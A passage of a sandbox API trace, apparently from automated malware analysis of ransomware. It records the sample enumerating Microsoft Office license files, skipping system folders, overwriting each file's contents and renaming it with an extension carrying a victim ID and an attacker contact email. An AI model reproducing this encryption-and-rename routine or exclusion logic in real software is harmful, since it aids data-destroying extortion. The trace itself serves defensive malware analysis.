lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdCO365R_SubTrial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdco365r_subtrial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0111.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.934] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed25796c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed25796c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed3aee76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_Subscription-pl.xrm-ms", cAlternateFileName="VI81D9~1.XRM")) returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.934] lstrcmpiW (lpString1="VisioStdO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.935] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0111.935] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0111.935] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.937] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.938] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.938] CloseHandle (hObject=0x45c) returned 1 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0111.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0111.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0111.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0111.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0111.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.939] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec8f44e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec8f44e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec9b309b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x535a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_Subscription-ppd.xrm-ms", cAlternateFileName="VI4A59~1.XRM")) returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.939] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.940] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0111.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0111.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.941] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21338) returned 1 [0111.941] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.941] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5350) returned 0x24c1d0 [0111.941] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5350, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5350, lpOverlapped=0x0) returned 1 [0111.943] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.943] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5350, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5350, lpOverlapped=0x0) returned 1 [0111.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.944] CloseHandle (hObject=0x45c) returned 1 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0111.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0111.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0111.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0111.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0111.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.945] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec8ce288, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec8ce288, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec98ce75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d78, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="VI5981~1.XRM")) returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.945] lstrcmpiW (lpString1="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0111.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0111.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0111.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0111.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22ce70, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0111.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0111.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0111.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0111.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.946] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11640) returned 1 [0111.946] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0111.947] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0111.949] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.949] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0111.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.949] CloseHandle (hObject=0x45c) returned 1 [0111.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0111.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: 